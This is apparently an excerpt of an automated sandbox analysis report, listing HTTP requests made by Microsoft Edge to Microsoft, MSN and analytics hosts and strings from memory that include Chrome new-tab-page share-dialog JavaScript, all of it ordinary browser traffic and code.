    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733878937&P2=404&P3=2&P4=SCMul%2f47cvvfTrxk2Oecz5thun580L8L8MjZ7M2ctpAZI%2bRb5wSzdYq%2bRKzNb%2fz25vGEeKfFNuYir6y%2bDPqfpQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: 4rpSGj9TwHFts2cfoUt1k+Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /b?rn=1733274145725&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D5C2060AD936F240B4A352BAC196EE0&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1733274145724&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=079e86c896ad4d31a1c2b187d398af48&activityId=079e86c896ad4d31a1c2b187d398af48&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0D5C2060AD936F240B4A352BAC196EE0; _EDGE_S=F=1&SID=395963600FB8650E14C0762B0ED96416; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=0D5C2060AD936F240B4A352BAC196EE0&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=49955c179ab94cedecda19fb83bf8b8f HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0D5C2060AD936F240B4A352BAC196EE0; _EDGE_S=F=1&SID=395963600FB8650E14C0762B0ED96416; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1u24yb.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /b2?rn=1733274145725&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0D5C2060AD936F240B4A352BAC196EE0&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1D9fa9c5b4826f04d268ee41733274148; XID=1D9fa9c5b4826f04d268ee41733274148
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=0D5C2060AD936F240B4A352BAC196EE0&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=6a118d4613a843228b142319b9d24892 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0D5C2060AD936F240B4A352BAC196EE0; _EDGE_S=F=1&SID=395963600FB8650E14C0762B0ED96416; _EDGE_V=1
    Source: global trafficHTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyCD.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB1msyO7.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1733274145724&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=079e86c896ad4d31a1c2b187d398af48&activityId=079e86c896ad4d31a1c2b187d398af48&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B8BB7CAE442C4E8088672812C9FBFC26&MUID=0D5C2060AD936F240B4A352BAC196EE0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0D5C2060AD936F240B4A352BAC196EE0; _EDGE_S=F=1&SID=395963600FB8650E14C0762B0ED96416; _EDGE_V=1; SM=T; _C_ETH=1; msnup=
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
    Source: 000003.log0.21.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
    Source: 000003.log0.21.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
    Source: 000003.log0.21.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
    Source: chrome.exe, 00000010.00000003.3420315850.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420530926.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420141043.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: chrome.exe, 00000010.00000003.3420315850.00004EB400FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420530926.00004EB4002F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3420141043.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return 